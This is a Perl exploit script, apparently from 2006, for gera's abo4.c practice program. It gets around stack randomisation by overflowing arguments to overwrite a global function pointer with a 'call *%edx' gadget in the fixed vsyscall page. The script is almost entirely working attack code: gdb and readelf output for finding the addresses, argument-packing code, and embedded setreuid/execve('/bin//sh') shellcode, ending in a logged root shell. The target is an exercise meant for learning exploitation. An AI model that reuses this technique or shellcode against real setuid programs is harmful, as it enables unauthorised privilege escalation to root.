#!/usr/bin/perl -w
use strict;
#
# [exp_rand_abo4.pl] Wed Apr  5 18:00:38 CEST 2006
#
# abo4.c exploit - Solution against stack randomization
# http://community.core-sdi.com/~gera/InsecureProgramming/abo4.c
#
# Copyright: bunker - http://rawlab.altervista.org
# 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
#
# - Random stack workaround: instead of guessing a randomised stack address,
#   return into a "call *%edx" gadget that lives at a fixed address in the
#   kernel-mapped page at 0xffffe000 (the vsyscall/vDSO page; fixed on kernels
#   of this era, so kernels that randomise that page require a different gadget source)
# [Find "call *%edx" in memory]
#
# bunker@syn:~/abo$ gdb abo4
# (gdb) break main
# Breakpoint 1 at 0x80483ad
# (gdb) run
# Starting program: /home/bunker/abo/abo4
# Breakpoint 1, 0x080483ad in main ()
# (gdb) x/i 0xffffe000
# 0xffffe000:     jg     0xffffe047
# ...
# (gdb)
# 0xffffe74f:     call   *%edx
#
#
# [Find the address of the global function pointer "fn" — readelf reports it
#  as an OBJECT symbol, i.e. a variable in the data segment, not a PLT stub]
# 
# bunker@syn:~/abo4$ readelf -a abo4 | grep fn
#    126: 08049728     4 OBJECT  GLOBAL DEFAULT   22 fn
#    
#              
# bunker@syn:~/abo$ ls -al abo4
#  -rwsr-sr-x 1 root users 8340 2006-04-02 20:11 abo4
# bunker@syn:~/abo$ perl exp_rand_abo4.pl
#  sh-3.1# id
#   uid=0(root) gid=100(users) groups=17(audio),18(video),19(cdrom),100(users)


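# Address of the "call *%edx" gadget in the fixed-address page at 0xffffe000
# (see the gdb session above).  Kernel-specific: re-derive it on any other
# machine, and expect it to move on kernels that randomise that page.
my $ret = 0xffffe74f;

# Address of the target's global function pointer `fn`.  readelf lists it as
# an OBJECT symbol (a data-segment variable), so this is the variable itself,
# not a PLT entry.  Binary-specific: re-run readelf after any rebuild.
my $fn  = 0x08049728;

# Linux/x86 shellcode, 32 bytes, free of 0x00 so it survives strcpy()/argv:
#   push 0x46; pop eax; xor ebx,ebx; xor ecx,ecx; int 0x80      -> setreuid(0,0)
#   push 0xb; pop eax; cdq; push edx; push "//sh"; push "/bin";
#   mov ebx,esp; push edx; push ebx; mov ecx,esp; int 0x80      -> execve("/bin//sh", ["/bin//sh"], NULL)
my $sc = "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x6a\x0b\x58".
         "\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e".
         "\x89\xe3\x52\x53\x89\xe1\xcd\x80";

# vulnerable (setuid) binary
my $vuln = "./abo4";

# Build the three argv strings.  'V' packs an explicit 32-bit little-endian
# word, which is what the x86 target expects regardless of the host perl's
# native byte order ('L' is native-endian and only happens to match on x86).
# Neither address contains a 0x00 byte, so strcpy() copies them intact.
my $arg1 = pack("V", $fn) x 68;   # 272 bytes of &fn; presumably overruns the
                                  # target's stack buffer so the pointer used
                                  # by its second strcpy() becomes &fn (count
                                  # tuned to this binary's frame — verify in gdb)
my $arg2 = pack("V", $ret);       # written through that pointer: fn = gadget

# List-form exec: no shell involved, argv bytes passed verbatim.  The gadget
# is useful because %edx apparently holds the address of argv[3] (the
# shellcode) when fn() is called — confirm in gdb on the target kernel.
# exec only returns on failure, so report that instead of exiting silently.
exec $vuln, $arg1, $arg2, $sc
    or die "exec $vuln failed: $!\n";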

